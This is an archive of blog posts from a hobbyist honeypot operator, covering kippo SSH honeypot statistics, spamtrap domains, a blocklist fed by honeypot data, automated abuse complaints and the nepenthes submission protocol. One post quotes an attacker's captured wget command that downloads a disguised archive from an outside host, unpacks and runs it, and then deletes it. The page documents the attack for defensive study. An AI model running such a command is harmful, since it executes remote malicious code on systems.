Today I received a notification from projecthoneypot.org
that one of my donated spamtrap-domains helped to catch a new
harvester. Feels good to be able to help 🙂
Posts Tagged ‘Honeypots’
projecthoneypot.org
Thursday, January 26th, 2012kippo-graph
Wednesday, December 28th, 2011After trying to build some nice graphs for the kippo-honeypot with PyCha I found
this little toolbox making things way better than I did:
kippo-graph Homepage (link fixed)
Here are the first results from my honeypot: (no live db-queries made, so Inputs
are not visible right now) Kippo-Stats
kippo stats
Wednesday, December 14th, 2011The kippo honeypot is now running for about a week..
Up to now I have seen
* more than 1.3 Million Connects
* more than 7.100 successful logins
* > 2.200 commands typed
* more than 2.100 different Source IP addresses
* 178 Files uploaded, most of them psyBNC bouncers
Whow.. I expected *some* brute-force atempts, but that much?
successful ssh brute-force found by kippo
Wednesday, December 7th, 2011The sshd – honeypot named kippo is a fun tool to play with. After installing it I found
more than 1000 successful logins in about 12 hours! Most logins do nothing
after having success, but some are downloading files and try to do “things”:
-rw——- 1 kippo kippo 81211778 Dec 6 23:20 20111206231910_http___download_microsoft_com_download_win2000platform_SP_SP3_NT5_EN_US_W2Ksp3_exe
-rw——- 1 kippo kippo 34603008 Dec 7 01:19 20111207011938_http___download_microsoft_com_download_win2000platform_SP_SP3_NT5_EN_US_W2Ksp3_exe
-rw——- 1 kippo kippo 53477376 Dec 7 01:21 20111207012055_http___download_microsoft_com_download_win2000platform_SP_SP3_NT5_EN_US_W2Ksp3_exe
-rw——- 1 kippo kippo 3513408 Dec 7 01:21 20111207012120_http___www_steampowered_com_download_hldsupdatetool_bin
-rw——- 1 kippo kippo 608074 Dec 7 08:46 20111207084559_http___4u_moy_su_bnc_jpg
coming from commands like:
CMD: wget http://4u.moy.su/bnc.jpg;tar zxvf bnc.jpg;rm -rf bnc.jpg;cd .log;./go
I will try to build some public stats later..
C&C – honeypot
Thursday, November 4th, 2010Now the criminals run honeypots too:
http://blog.tllod.com/2010/11/03/statistics-dont-lie-or-do-they/
Don’t trust the admin interface of a Malware Control Server..:-)
own rbl started
Saturday, May 8th, 2010I finally managed to create my own RBL (realtime blocklist) feeded by my honeypot.
All verified IPs which successfully attacked the honeypot are put into a database, which
provides a rbl for our MXes. The IPs are held for 24 hours except those which have more than 50
successful attacks within the last day. I was wondering if there were any mail-hits to be seen
at all; at least these are totally different attack vectors. But strangely enough I could see
blocked emails because of the entries made by the honeypot. We will see how well this
performs.
50.000 complaints
Thursday, October 15th, 2009Whow.. I finally crossed the 50.000 complaints line. I got about 18.600 replies to
my complaints; either being autoreplies by abuse departments, activity statements of the
providers or “over quota” or similar bounce messages from abuse-mailboxes.
I hope that this service does something good.
20.000 complaints
Wednesday, August 19th, 2009Since the beginning of sending automated complaints due to attacks of my honeypot the system now has send out more than 20.000 emails. Some positive reactions have reached me, so I hope that this service is somewhat helpful. Funny are the bounces from the not reachable abuse-addresses .. will put them on a different page soon.
New Honeypot
Tuesday, June 16th, 2009The nepenthes-teammembers have been busy working on a new (low interaction) honeypot.
The name dionaea is taken from another carnivore. Here is the link to the project-homepage. Sounds interesting, since it is written in C with python-modules attached.
submit-mwserv.conf
Thursday, January 1st, 2009When dealing with submit modules of nepenthes, you will find several notices about the favourite one of the authors of nepenthes, namely submit-mwserv (with the appropriate submit-mwserv.conf – file).
However, there is no hint on how to write the necessary ‘submit’ application on the receiving server-side..
To see what data is actually sent, I set up a listening socket and wrote the incoming raw – data to a file.
They looked like:
POST /heartbeat HTTP/1.1
User-Agent: nepenthes 0.2.2 (Linux, x86, g++)
Host: www.spamversand.de:8989
Accept: */*
Content-Length: 487
Expect: 100-continue
Content-Type: multipart/form-data; boundary=----------------------------285dc72e
916a
A normal http-post request. Not really normal though, because the Expect: “100-continue” header was new to me. A quick google-check found rfc2616 : 8.2.3 Use of the 100 (Continue) Status So I will answer the request with a “100” response and will see what data will follow..